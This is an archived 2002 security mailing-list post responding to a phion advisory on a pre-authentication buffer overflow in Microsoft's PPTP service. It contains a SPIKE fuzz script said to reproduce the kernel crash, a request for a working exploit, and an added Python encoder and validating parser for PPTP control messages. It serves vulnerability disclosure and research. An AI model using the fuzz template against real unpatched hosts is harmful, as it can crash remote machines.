SPIKE 2.6.2 or above should be able to handle this .spk file, which will replicate the vulnerability. Someone send me a working sploit in exchange, please. I'm too lazy to muck with it. (Or I have other exploits to muck with, one or the other :>)

-dave

P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy) at http://www.immunitysec.com/spike.html, if you haven't already.

P.P.S. This script is released under the terms of the GNU GPL v 2.0.

On Thu, 2002-09-26 at 05:43, shat_private wrote:
> phion Security Advisory 26/09/2002
>
> Microsoft PPTP Server and Client remote vulnerability
>
>
> Summary
> -----------------------------
>
> The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
> remotely exploitable pre-authentication buffer overflow.
>
>
> Affected Systems
> -----------------------------
>
> Microsoft Windows 2000 and XP running either a PPTP Server or Client.
>
>
> Impact
> -----------------------------
>
> With a specially crafted PPTP packet it is possible to overwrite kernel
> memory.
>
> A DoS resulting in a lockup of the machine has been verified on
> Windows 2000 SP3 and Windows XP.
>
> A remote compromise should be possible deploying proper shellcode,
> as we were able to fill EDI and EDX with our data.
>
> Clients are vulnerable too, because the Service always listens on port
> 1723 on any interface of the machine; this might be of special concern
> to DSL users which use PPTP to connect to their modem.
>
>
> Solution
> -----------------------------
>
> As a temporary solution for the Client issue, one might firewall the PPTP
> port in the Internet Connection Firewall for Windows XP.
>
> We don't know of any solution for Windows 2000 and Windows XP PPTP servers.
>
> The vendor has been informed.
>
>
> Acknowledgements
> -----------------------------
>
> The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
> on behalf of phion Information Technologies.
>
>
> Contact Information
> -----------------------------
>
> phion Information Technologies can be reached via:
> officeat_private / http://www.phion.com
>
> Stephan Hoffmann can be reached via:
> shat_private
>
> Thomas Unterleitner can be reached via:
> t.unterleitnerat_private
>
> References
> -----------------------------
>
> [1] phion Information Technologies
> http://www.phion.com/
>
> Exploit
> -----------------------------
>
> phion Information Technologies will not provide an exploit for this issue.
>
>
> Disclaimer
> -----------------------------
>
> This advisory does not claim to be complete or to be usable for any
> purpose.
>
> This advisory is free for open distribution in unmodified form.
>
> Articles or Publications that are based on information from this advisory
> have to include link [1].
>

//start control connection request (SCCRQ)
s_block_start("PPTP");
//Length: size of the whole block, filled in by SPIKE
s_binary_block_size_halfword_bigendian("PPTP");
//PPTP message type 1 - control message
s_int_variable(0x0001,5);
//magic cookie
s_binary("1a 2b 3c 4d");
//control message type 1 - start control connection request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//protocol version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//framing capabilities: 3 (async and sync)
s_binary("00000003");
//bearer capabilities: 2 (digital)
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);
//hostname: 64-byte field, one fuzzable byte + 63 NULs
s_string_variable("A");
s_binary_repeat("00",63);
//vendor: same layout
s_string_variable("A");
s_binary_repeat("00",63);
s_block_end("PPTP");

///
/// NEXT PACKET
///
///

//start outgoing call request (OCRQ)
s_block_start("PPTP2");
//Length: size of the whole block, filled in by SPIKE
s_binary_block_size_halfword_bigendian("PPTP2");
//PPTP message type 1 - control message
s_int_variable(0x0001,5);
//magic cookie
s_binary("1a 2b 3c 4d");
//control message type 7 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");
//call id
s_binary("0000");
//call serial number
s_binary("0000");
//min bps (2400)
s_binary("00000960");
//max bps (10000000)
s_binary("00989680");
//bearer type: digital
s_binary("00000002");
//framing type
s_binary("00000003");
//receive window size
s_binary("0003");
//packet processing delay
s_binary("0000");
//phone number length: size of the PHONENUMBER block below, filled in by SPIKE
s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
//phone number: fuzzable variable-length string (not padded to 64 bytes here)
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress: fuzzable variable-length string
s_string_variable("");
s_block_end("PPTP2");
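As an added example (not part of Dave's post, the SPIKE distribution or the phion advisory), the following Python builds the same two PPTP control messages the .spk script above produces, using the fixed-width RFC 2637 layout (SCCRQ in section 2.1, OCRQ in section 2.7, both fixed-size: 156 and 168 bytes), and parses them back with the size and cookie checks a careful receiver should apply before reading the body. The constant values (version 0x0100, framing 3, bearer 2, 2400 and 10,000,000 bps, window 3) are taken from the script; the hostname, vendor and phone strings are constructed sample input. The `pad=False` option is my own way of modelling what the script's `s_string_variable()` fields do under fuzzing: the string grows to an arbitrary length and `s_binary_block_size_halfword_bigendian()` recomputes the Length field to match, so the packet is self-consistent yet no longer fits the fixed layout.

```python
"""Encoder/parser for the two PPTP control messages the SPIKE script emits.

Added example, not part of the original post. Field layout follows RFC 2637
(SCCRQ: section 2.1, OCRQ: section 2.7); sample strings are constructed.
"""
import struct

PPTP_MAGIC_COOKIE = 0x1A2B3C4D
PPTP_MSG_CONTROL = 1        # PPTP Message Type: control message
SCCRQ = 1                   # Start-Control-Connection-Request
OCRQ = 7                    # Outgoing-Call-Request
FIXED_LEN = {SCCRQ: 156, OCRQ: 168}   # RFC 2637 control messages have fixed sizes

# Common header: Length, PPTP Message Type, Magic Cookie, Control Message Type, Reserved0
HDR = struct.Struct("!HHIHH")
SCCRQ_FIELDS = struct.Struct("!HHIIHH")      # version, reserved1, framing, bearer, max channels, firmware
OCRQ_FIELDS = struct.Struct("!HHIIIIHHHH")   # call id, serial, min bps, max bps, bearer, framing,
                                             # recv window, processing delay, phone number length, reserved1


def fixed_field(s: bytes, width: int = 64) -> bytes:
    """NUL-pad (or truncate) to the RFC's fixed 64-octet string field."""
    return s[:width].ljust(width, b"\x00")


def build_sccrq(hostname: bytes, vendor: bytes, *, pad: bool = True) -> bytes:
    """SCCRQ with the same constant values as the SPIKE 'PPTP' block.

    pad=False (assumption: models a SPIKE mutation of s_string_variable) writes
    the hostname at its actual length and recomputes Length to match, so the
    message stays self-consistent but no longer fits the fixed layout.
    """
    host = fixed_field(hostname) if pad else hostname
    body = SCCRQ_FIELDS.pack(0x0100, 0, 3, 2, 0xFFFF, 1) + host + fixed_field(vendor)
    return HDR.pack(HDR.size + len(body), PPTP_MSG_CONTROL, PPTP_MAGIC_COOKIE, SCCRQ, 0) + body


def build_ocrq(phone: bytes, subaddress: bytes = b"") -> bytes:
    """OCRQ with the constant values of the SPIKE 'PPTP2' block (2400..10 Mbps,
    bearer digital, framing 3, window 3); phone/subaddress padded to 64 octets."""
    body = OCRQ_FIELDS.pack(0, 0, 2400, 10_000_000, 2, 3, 3, 0, len(phone), 0)
    body += fixed_field(phone) + fixed_field(subaddress)
    return HDR.pack(HDR.size + len(body), PPTP_MSG_CONTROL, PPTP_MAGIC_COOKIE, OCRQ, 0) + body


def parse_control(data: bytes) -> dict:
    """Parse a control message, validating sizes before touching the body."""
    if len(data) < HDR.size:
        raise ValueError("short packet: %d bytes" % len(data))
    length, msg_type, cookie, ctrl_type, _ = HDR.unpack_from(data)
    if cookie != PPTP_MAGIC_COOKIE:
        raise ValueError("bad magic cookie 0x%08x" % cookie)
    if msg_type != PPTP_MSG_CONTROL:
        raise ValueError("unexpected PPTP message type %d" % msg_type)
    if length != len(data):
        raise ValueError("Length field %d != %d bytes on the wire" % (length, len(data)))
    if ctrl_type in FIXED_LEN and length != FIXED_LEN[ctrl_type]:
        raise ValueError("control type %d must be %d bytes, got %d"
                         % (ctrl_type, FIXED_LEN[ctrl_type], length))
    body = data[HDR.size:]
    if ctrl_type == SCCRQ:
        version, _, framing, bearer, max_ch, fw = SCCRQ_FIELDS.unpack_from(body)
        off = SCCRQ_FIELDS.size
        return {"type": "SCCRQ", "version": version, "framing": framing, "bearer": bearer,
                "max_channels": max_ch, "firmware": fw,
                "hostname": body[off:off + 64].rstrip(b"\x00"),
                "vendor": body[off + 64:off + 128].rstrip(b"\x00")}
    if ctrl_type == OCRQ:
        (call_id, serial, min_bps, max_bps, bearer, framing,
         window, delay, phone_len, _) = OCRQ_FIELDS.unpack_from(body)
        if phone_len > 64:
            raise ValueError("phone number length %d exceeds 64-octet field" % phone_len)
        off = OCRQ_FIELDS.size
        return {"type": "OCRQ", "call_id": call_id, "serial": serial, "min_bps": min_bps,
                "max_bps": max_bps, "bearer": bearer, "framing": framing, "window": window,
                "delay": delay, "phone": body[off:off + phone_len],
                "subaddress": body[off + 64:off + 128].rstrip(b"\x00")}
    return {"type": ctrl_type}


def check(data: bytes) -> str:
    """'ok' if the message passes every size/cookie check, else the reason."""
    try:
        parse_control(data)
        return "ok"
    except ValueError as e:
        return str(e)


if __name__ == "__main__":
    # Constructed sample input: the packets the unfuzzed script would send,
    # plus one SCCRQ whose hostname was grown to 500 bytes as SPIKE might do.
    for pkt in (build_sccrq(b"A", b"A"), build_ocrq(b"5551234"),
                build_sccrq(b"A" * 500, b"A", pad=False)):
        print(len(pkt), check(pkt))
```

The parser rejects an oversized SCCRQ on the fixed-size check alone, before any field is copied; the original script's OCRQ sends the phone number and subaddress unpadded, so its unfuzzed second packet is shorter than 168 bytes and would fail the same check, which is a reminder that the .spk is a fuzz template, not an RFC-conformant client.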
This archive was generated by hypermail 2b30 : Thu Sep 26 2002 - 15:27:53 PDT